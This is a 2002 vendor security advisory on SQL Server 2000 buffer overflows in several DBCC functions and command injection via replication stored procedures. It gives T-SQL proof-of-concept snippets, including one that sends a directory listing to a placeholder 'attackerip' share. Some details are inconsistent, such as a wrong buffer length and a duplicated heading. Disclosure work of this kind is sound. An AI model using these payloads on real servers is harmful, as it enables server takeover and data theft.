Application Security Inc. - Securing Business by Securing Enterprise Applications

home

client login

partner login

online store

search:

MOST POPULAR CONTENT

1.	Top Database Security Threats for 2008
2.	Database Security Best Practices for Federal Agencies
3.	PCI Compliance at the Database Level
4.	Forrester WAVE Summary Scorecard
5.	SOX Compliance and Database Security

Multiple buffer overflows in DBCC and SQL Injections

July 26, 2002

Credit:

This vulnerability was researched and discovered by Cesar Cerrudo (sqlsec@yahoo.com).

To determine if your Microsoft SQL Server installations have this vulnerability, download AppDetective for Microsoft SQL Server from:

http://www.appsecinc.com/products/appdetective/mssql/

Risk Level: Varying from High to Low

Summary:

Several buffer overflows in the DBCC built-in function and several SQL Injection vulnerabilities have been discovered in Microsoft SQL Server. Three of the buffer overflows are for DBCC calls that can be executable by all valid logins on the server. One of the SQL Injection vulnerabilities can be executed by all valid logins on the server but only if the SQL Server Agent Proxy is enabled.

Details:

[DBCC INDEXDEFRAG]

Microsoft SQL Server provides a built-in function used to defragment clustered and secondary indexes of a table or view. This function is called DBCC INDEXDEFRAG. The function accepts three parameters.

The DBCC INDEXDEFRAG function does not properly allocate enough memory when called with a long string as the second parameters. This causes the stack to be overwritten and allows an attacker to inject code onto the stack to be executed.

On Microsoft SQL Server 2000, the overflow occurs when a buffer of 3275 characters or greater is passed into the first parameter. Below is an example.

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('A', 3275))
DBCC INDEXDEFRAG ( '', @test, '')

DBCC INDEXDEFRAG is a built-in function and as such can not be removed from SQL Server and permissions to execute the function can not be revoked or denied. Because of these factors, any non-privileged login can gain full control of the server. This vulnerability can not be used without a valid SQL Server connection.

[DBCC SHOWCONTIG]

Microsoft SQL Server provides a built-in function used to display fragmentation information for the data and indexes of the specified table. This function is called DBCC SHOWCONTIG. The function accepts two parameters.

The DBCC SHOWCONTIG function does not properly allocate enough memory when called with a long string as the first parameters. This causes the stack to be overwritten and allows an attacker to inject code onto the stack to be executed.

On Microsoft SQL Server 2000, the overflow occurs when a buffer of 4303 characters or greater is passed into the first parameter. Below is an example.

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('A', 4303))
DBCC SHOWCONTIG (@test, '')

DBCC SHOWCONTIG is a built-in function and as such can not be removed from SQL Server and permissions to execute the function can not be revoked or denied. Because of these factors, any non-privileged login can gain full control of the server. This vulnerability can not be used without a valid SQL Server connection.

[DBCC CLEANTABLE]

Microsoft SQL Server provides a built-in function used to reclaim space for dropped variable length columns and text columns. This function is called DBCC CLEANTABLE. The function accepts three parameters.

The DBCC CLEANTABLE function does not properly allocate enough memory when called with a long string as the first parameters. This causes the stack to be overwritten and allows an attacker to inject code onto the stack to be executed.

On Microsoft SQL Server 2000, the overflow occurs when a buffer of 751 characters or greater is passed into the first parameter. Below is an example.

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('A', 277))
DBCC CLEANTABLE ( '', @test)

DBCC CLEANTABLE is a built-in function and as such can not be removed from SQL Server and permissions to execute the function can not be revoked or denied. Because of these factors, any non-privileged login can gain full control of the server. This vulnerability can not be used without a valid SQL Server connection. [DBCC addextendedproc]

Microsoft SQL Server provides a built-in function to add extended stored procedures. This function is called DBCC addextendedproc. The function accepts two parameters, a name for the procedure and a file name..

The DBCC addextendedproc function does not properly allocate enough memory when called with a long string as the second parameters. This causes the stack to be overwritten and allows an attacker to inject code onto the stack to be executed.

The overflow occurs when a buffer of 4100 characters or greater is passed into the second parameter. Below is an example.

DBCC addextendedproc ('xp_hello', 'XXX[4100+]'')
DBCC addextendedproc is a built-in function and as such can not be removed from SQL Server. DBCC addextendedproc permissions default to members of the sysadmin fixed server role and are not transferable. This vulnerability can be used to elevate privileges to the operating system or other instances on the server.

[DBCC CHECKCONSTRAINTS]

Microsoft SQL Server provides a built-in function used to check the integrity of a specified constraint or all constraints on a specified table. This function is called DBCC CHECKCONSTRAINTS. The function accepts one parameter.

The DBCC CHECKCONSTRAINTS function does not properly allocate enough memory when called with a long string as the first parameters. This causes the stack to be overwritten and allows an attacker to inject code onto the stack to be executed.

On Microsoft SQL Server 2000, the overflow occurs when a buffer of 751 characters or greater is passed into the first parameter. Below is an example.

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('A',751))
DBCC CHECKCONSTRAINTS (@test)

DBCC CHECKCONSTRAINTS is a built-in function and as such can not be removed from SQL Server. DBCC CHECKCONSTRAINTS permissions default to members of the sysadmin fixed server role and the db_owner fixed database role, and are not transferable. This vulnerability can be used to escalate privileges from db_owner to sysadmin..

[sp_MScopyscriptfile]

The stored procedure sp_MScopyscriptfile creates a directory in the SQL Server replication directory and then copies a script file into it. The only parameter to this stored procedure is @scriptfile and this parameter represents the name of the script file to be copied. Arbitrary operating system commands can be injected into values passed to this parameter and those commands are then executed by xp_cmdshell.

Below is an example of exploiting this vulnerability.

declare @command varchar(100)
declare @scriptfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ > "\\attackerip\share\dir.txt"'
select @scriptfile='c:\autoexec.bat > nul" | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scriptfile ,''

This vulnerability can only be exploited if the SQL Server Agent Proxy account is enabled. This service is not enabled by default but if it is all valid logins on the server can execute this stored procedure.

[sp_MScopyscriptfile]

The stored procedure sp_attachsubscription can only be executed by users with the db_owner fixed database role. Below is an example of how this stored procedure can be used to elevate privileges to full dba.

set concat_null_yields_null off
declare @cmd varchar(300)
set @cmd='d:\auto.bat" "d:\test.bat' + char(10) + char(13)
exec sp_attachsubscription 'test', @cmd

Fix:

To fix these problems, you should install hotfix 8.00.655 in addition to Service 2 of SQL Server 2000. CVE Reference:

CAN-2001-0644

Additional information:

http://www.microsoft.com/technet/security/bulletin/MS02-034.asp